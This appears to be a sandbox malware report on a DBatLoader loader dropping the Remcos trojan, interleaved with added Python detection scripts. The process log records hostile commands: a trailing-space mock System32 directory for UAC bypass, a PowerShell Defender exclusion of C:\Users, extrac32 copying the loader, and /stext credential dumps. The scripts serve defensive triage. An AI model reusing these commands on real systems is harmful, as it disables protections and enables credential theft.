Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@39/16@7/3
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 27_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 27_2_004182CE
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_12347952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 24_2_12347952
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040A7F18 GetDiskFreeSpaceA, 0_2_040A7F18
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1233F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 24_2_1233F474
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B6D0C CoCreateInstance, 0_2_040B6D0C
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234B4A8 FindResourceA,LoadResource,LockResource,SizeofResource, 24_2_1234B4A8
Source: C:\Users\Public\Libraries\wkrriuhD.pif Code function: 24_2_1234AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 24_2_1234AA4A
Source: C:\Users\user\Desktop\midyear_statement.exe File created: C:\Users\Public\Libraries\Null
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Users\Public\Libraries\wkrriuhD.pif Mutant created: \Sessions\1\BaseNamedObjects\Rmc-W5UGP5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqjdho.kwp.ps1
Source: C:\Windows \System32\2506803.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
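The process-creation line above is the one to read twice: cmd.exe is launched from `C:\Windows \System32\` and runs `C:\windows \system32\KDECO.bat`, where the directory name "Windows " carries a trailing space. The file system treats that as a directory distinct from the real `C:\Windows`, but code that trims whitespace before comparing a path against a trusted location can accept it as the genuine system directory; this "mock trusted directory" is the pattern behind the TrustedPath UAC bypass and the related DLL search-order hijack flagged in this report. The triage helper below is an added example, not part of the Joe Sandbox report or of any vendor tooling: it scans process-creation records for path components that equal a trusted directory name only after whitespace is stripped. The event records are constructed here with Sysmon-style field names (EventId, Image, CommandLine); only the `C:\Windows \System32\2506803.exe` image and the KDECO.bat command line are taken from the report, the other events are benign controls.

```python
import re
from dataclasses import dataclass

# Directory names whose trusted status a whitespace-trimming path check might
# grant to a look-alike such as "Windows " (compared lower-cased, stripped).
TRUSTED_DIR_NAMES = frozenset({
    "windows", "system32", "syswow64", "program files", "program files (x86)",
})

# Bare Windows paths embedded in a command line: drive letter, colon,
# backslash, then everything up to the next double quote. cmd.exe quoting
# keeps the spaces inside a quoted path together, which is what we rely on.
_WIN_PATH = re.compile(r'[A-Za-z]:\\[^"]*')


def mock_trusted_components(path: str) -> list[str]:
    """Return the components of `path` that spell a trusted directory name
    once surrounding whitespace is stripped but carry that whitespace in the
    raw path, e.g. ['Windows '] for 'C:\\Windows \\System32\\x.exe'."""
    hits = []
    for comp in path.split("\\"):
        if comp != comp.strip() and comp.strip().lower() in TRUSTED_DIR_NAMES:
            hits.append(comp)
    return hits


@dataclass
class Finding:
    event_id: int
    where: str        # "Image" or "CommandLine"
    component: str    # offending component, whitespace preserved
    evidence: str     # the path the component was found in


def scan_event(event: dict) -> list[Finding]:
    """Inspect the Image path and every path embedded in CommandLine."""
    findings = []
    candidates = [("Image", event.get("Image", ""))]
    candidates += [("CommandLine", p)
                   for p in _WIN_PATH.findall(event.get("CommandLine", ""))]
    for where, path in candidates:
        for comp in mock_trusted_components(path):
            findings.append(Finding(event["EventId"], where, comp, path))
    return findings


def scan_events(events) -> list[Finding]:
    out = []
    for ev in events:
        out.extend(scan_event(ev))
    return out


# Constructed sample events (Sysmon-style process creation). Event 2 mirrors
# the report's KDECO.bat launch; events 1 and 3 are benign controls, the
# latter showing that whitespace in a non-trusted component is not flagged.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c "C:\Program Files\Vendor\update.bat"'},
    {"EventId": 2, "Image": r"C:\Windows \System32\2506803.exe",
     "CommandLine": r'C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""'},
    {"EventId": 3, "Image": r"C:\Users\user\Desktop\tool.exe",
     "CommandLine": r'"C:\Users\user\Desktop\tool.exe" --path "C:\Windows\Temp\ "'},
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.where} contains {f.component!r} in {f.evidence}")
```

On the sample set only event 2 is reported, twice: once for the image path under `Windows ` and once for the quoted `C:\windows \system32\KDECO.bat` argument. Matching on the stripped name rather than on any whitespace keeps the check quiet on ordinary paths while still catching the `C:\Windows \System32` form regardless of case or of which quoting cmd.exe applied.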
Source: C:\Users\Public\Libraries\wkrriuhD.pif Command line argument: PG 24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif Command line argument: 8SG 24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif Command line argument: dMG 24_2_0059F7A7
Source: C:\Users\Public\Libraries\wkrriuhD.pif Command line argument: PSG 24_2_0059F7A7
Source: C:\Users\user\Desktop\midyear_statement.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\wkrriuhD.pif System information queried: HandleInformation
Source: C:\Users\Public\Libraries\wkrriuhD.pif File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\midyear_statement.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001C.00000002.1384508766.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wkrriuhD.pif, 00000018.00000002.3665263923.0000000014530000.00000040.10000000.00040000.00000000.sdmp, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wkrriuhD.pif, 0000001B.00000002.1406746333.00000000028A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wkrriuhD.pif, wkrriuhD.pif, 0000001B.00000002.1406156009.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: midyear_statement.exe ReversingLabs: Detection: 26%
Source: midyear_statement.exe Virustotal: Detection: 31%
Source: C:\Users\user\Desktop\midyear_statement.exe File read: C:\Users\user\Desktop\midyear_statement.exe
Source: C:\Users\Public\Libraries\wkrriuhD.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\midyear_statement.exe "C:\Users\user\Desktop\midyear_statement.exe"
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Windows \System32\2506803.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows \System32\2506803.exe "C:\Windows \System32\2506803.exe"
Source: C:\Windows \System32\2506803.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF
Source: C:\Users\user\Desktop\midyear_statement.exe Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm"
Source: C:\Users\Public\Libraries\wkrriuhD.pif Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl"
Source: unknown Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
Source: unknown Process created: C:\Users\Public\Libraries\Dhuirrkw.PIF "C:\Users\Public\Libraries\Dhuirrkw.PIF"
Source: C:\Users\Public\Libraries\Dhuirrkw.PIF Process created: C:\Users\Public\Libraries\wkrriuhD.pif C:\Users\Public\Libraries\wkrriuhD.pif
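The process tree above contains the whole DBatLoader-to-Remcos chain in a handful of command lines: two mkdir calls create "C:\Windows \System32" (note the trailing space after Windows; Win32 path normalisation strips it, so a binary placed there is treated as living in the real, trusted System32 while the directory itself is writable by the user), 2506803.exe (its debug string identifies it as easinvoker) is launched from that mock directory with netutils.dll dropped alongside it, KDECO.bat runs PowerShell Add-MpPreference to exclude all of C:\Users from Defender, extrac32 /C is used as a plain copy utility to clone the loader into C:\Users\Public\Libraries, and wkrriuhD.pif respawns itself with /stext output files in %TEMP%, the switch NirSoft-style recovery tools use to dump credentials to text. The following is an added example, not part of the Joe Sandbox report: a small Python scanner whose regex rules (the rule names and the function names are this example's own) run over a constructed event list copied from the command lines recorded above, with one benign svchost launch added as a control.

```python
import re
from typing import Dict, List, Tuple

# Detection rules; the rule names are this example's own labels, not Sigma titles.
RULES = {
    # "C:\Windows " with a trailing space. Path normalisation drops the space, so
    # "C:\Windows \System32\x.exe" looks like a trusted system path to the
    # auto-elevation check while the directory is writable by the user.
    "mock_trusted_dir": re.compile(r'[A-Za-z]:\\Windows (?=[\\"])', re.I),
    # Defender exclusions added or replaced from the command line.
    "defender_exclusion": re.compile(
        r'(?:Add|Set)-MpPreference\b.*-Exclusion(?:Path|Process|Extension|IpAddress)', re.I),
    # extrac32 /C copies an arbitrary file (LOLBin); here it clones the loader.
    "extrac32_copy": re.compile(r'extrac32(?:\.exe)?\b.*\s/C\s', re.I),
    # Any .pif under C:\Users\Public; backslashes may be doubled in logged lines.
    "public_libraries_pif": re.compile(r'\\+Users\\+Public\\+[^\s"]*\.pif\b', re.I),
    # /stext <file> is the text-output switch of NirSoft-style recovery tools,
    # which Remcos runs in child processes to dump browser and mail credentials.
    "nirsoft_stext_dump": re.compile(r'\s/s(?:text|xml|html|csv)\s', re.I),
}

# Constructed event list: (parent image, child command line) taken from the
# process tree recorded above, plus one benign svchost launch as a control.
PROCESS_EVENTS: List[Tuple[str, str]] = [
    ("midyear_statement.exe", r'cmd /c mkdir "\\?\C:\Windows "'),
    ("midyear_statement.exe", r'cmd /c mkdir "\\?\C:\Windows \System32"'),
    ("midyear_statement.exe", r'cmd /c "C:\Windows \System32\2506803.exe"'),
    ("2506803.exe", r'C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""'),
    ("cmd.exe", r'''powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"'''),
    ("midyear_statement.exe", r'C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF'),
    ("wkrriuhD.pif", r'C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb"'),
    ("midyear_statement.exe", r'C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc'),
]


def triggered_rules(cmdline: str) -> List[str]:
    """Return the sorted names of all rules matching one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))


def scan(events: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group the command lines of a process-creation feed by the rule they trip."""
    hits: Dict[str, List[str]] = {name: [] for name in RULES}
    for _parent, cmdline in events:
        for name in triggered_rules(cmdline):
            hits[name].append(cmdline)
    return hits


if __name__ == "__main__":
    for parent, cmdline in PROCESS_EVENTS:
        names = triggered_rules(cmdline)
        if names:
            print(f"{parent}: {', '.join(names)}\n    {cmdline}")
```

The trailing-space rule is the highest-value one: a legitimate installer has no reason to create "C:\Windows " and any hit is worth an alert on its own, whereas extrac32 /C and Add-MpPreference need the surrounding context (unsigned parent in a user directory, exclusion covering an entire profile tree) before they are more than a hunting lead.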
Source: C:\Users\user\Desktop\midyear_statement.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\Public\Libraries\wkrriuhD.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: midyear_statement.exe Static file information: File size 1265664 > 1048576
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1261008104.000000007EC30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr
Source: Binary string: easinvoker.pdbH source: midyear_statement.exe, 00000000.00000003.1260712967.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000003.1291692035.0000000015C05000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1386222924.000000007F070000.00000004.00001000.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1366143666.0000000002AC3000.00000004.00001000.00020000.00000000.sdmp, 2506803.exe, 00000010.00000002.1294538505.00007FF790071000.00000020.00000001.01000000.00000005.sdmp, 2506803.exe.0.dr

Data Obfuscation

Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 27.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 28.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 29.2.wkrriuhD.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 24.2.wkrriuhD.pif.12330000.2.unpack
Source: C:\Users\Public\Libraries\wkrriuhD.pif Unpacked PE file: 31.2.wkrriuhD.pif.24140000.2.unpack
Source: Yara match File source: 0.2.midyear_statement.exe.2656dc8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.midyear_statement.exe.2a46bd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.midyear_statement.exe.40a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.midyear_statement.exe.2656dc8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.midyear_statement.exe.2a46bd8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1365940643.0000000002A46000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1364633992.0000000002656000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1640507310.0000000004171000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1569609862.00000000040F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: wkrriuhD.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_040B7A50
Source: initial sample Static PE information: section where entry point is pointing to: .....
Source: midyear_statement.exe Static PE information: real checksum: 0x0 should be: 0x139d32
Source: netutils.dll.0.dr Static PE information: real checksum: 0x22e25 should be: 0x1cc51
Source: wkrriuhD.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: Dhuirrkw.PIF.23.dr Static PE information: real checksum: 0x0 should be: 0x139d32
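Two of the static indicators above are cheap to verify on any sample before detonation: the CheckSum field is 0 in midyear_statement.exe, wkrriuhD.pif and the Dhuirrkw.PIF copy where the report computes 0x139d32 and 0x1768a, netutils.dll carries a nonzero checksum (0x22e25) that no longer matches its contents (0x1cc51), and the TimeDateStamp of wkrriuhD.pif (0x9E9038DB) decodes to April 2054. The following is an added example, not from the report: it implements the standard PE checksum fold (sum of 32-bit words with carry folding, the CheckSum field itself skipped, plus the file length, as imagehlp computes it) and reads TimeDateStamp and CheckSum straight from the headers. The header builder only produces a constructed 312-byte header-only PE32 file, not a runnable executable, so that the block runs offline; all function names are this example's own.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as imagehlp computes it: fold all little-endian 32-bit words
    (skipping the CheckSum field), fold the result to 16 bits, add the file size."""
    total = 0
    aligned = len(data) - len(data) % 4
    for off in range(0, aligned, 4):
        if off == checksum_offset:
            continue
        total += int.from_bytes(data[off:off + 4], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    if aligned != len(data):                      # zero-pad a trailing partial word
        total += int.from_bytes(data[aligned:], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def inspect_pe(data: bytes, now_unix: Optional[int] = None) -> Dict[str, object]:
    """Read TimeDateStamp and CheckSum from the PE headers and flag the anomalies
    the report lists: zero or mismatching checksum, compile time in the future."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = int.from_bytes(data[0x3C:0x40], "little")            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    timestamp = int.from_bytes(data[pe + 8:pe + 12], "little")  # COFF TimeDateStamp
    magic = int.from_bytes(data[pe + 24:pe + 26], "little")
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_offset = pe + 24 + 64            # same offset in PE32 and PE32+
    stored = int.from_bytes(data[checksum_offset:checksum_offset + 4], "little")
    expected = pe_checksum(data, checksum_offset)
    if now_unix is None:
        now_unix = int(datetime.now(timezone.utc).timestamp())
    compiled = EPOCH + timedelta(seconds=timestamp)
    return {
        "compile_time": compiled.strftime("%Y-%m-%d %H:%M:%S UTC"),
        "compile_time_in_future": timestamp > now_unix,
        "stored_checksum": stored,
        "expected_checksum": expected,
        "checksum_zero": stored == 0,
        "checksum_mismatch": stored != expected,
    }


def build_minimal_pe(timestamp: int, checksum: int = 0) -> bytes:
    """Constructed test input: DOS stub, PE signature, COFF header and an empty
    PE32 optional header (312 bytes). Header-only, not a loadable image."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = (0x40).to_bytes(4, "little")
    coff = struct.pack("<HHIIIHH", 0x14C, 0, timestamp, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    opt[0:2] = (0x10B).to_bytes(2, "little")
    opt[64:68] = checksum.to_bytes(4, "little")
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Same TimeDateStamp as wkrriuhD.pif in the report, CheckSum left at zero.
    sample = build_minimal_pe(0x9E9038DB)
    for key, value in inspect_pe(sample).items():
        print(f"{key:24s} {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key:24s} {value}")
```

A zero checksum is only a weak signal on its own: many third-party linkers leave the field unset, and Windows only enforces it for drivers and DLLs loaded into critical processes. A nonzero checksum that no longer matches, as for netutils.dll here, is the stronger indicator, because it means the bytes were modified after the linker wrote the header. A compile timestamp in the future is a clear sign the field was overwritten, though a deliberately zeroed or otherwise faked timestamp is just as common.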
Source: 2506803.exe.0.dr Static PE information: section name: .imrsiv
Source: netutils.dll.0.dr Static PE information: section name: .....
Source: netutils.dll.0.dr Static PE information: section name: .....
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: ....
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: ....
Source: netutils.dll.0.dr Static PE information: section name: ......
Source: netutils.dll.0.dr Static PE information: section name: /4
Source: netutils.dll.0.dr Static PE information: section name: /19
Source: netutils.dll.0.dr Static PE information: section name: /31
Source: netutils.dll.0.dr Static PE information: section name: /45
Source: netutils.dll.0.dr Static PE information: section name: /57
Source: netutils.dll.0.dr Static PE information: section name: /70
Source: netutils.dll.0.dr Static PE information: section name: /81
Source: netutils.dll.0.dr Static PE information: section name: /92
Source: C:\Users\user\Desktop\midyear_statement.exe Code function: 0_2_040BD48C push ecx; mov dword ptr [esp], edx 0_2_040BD491
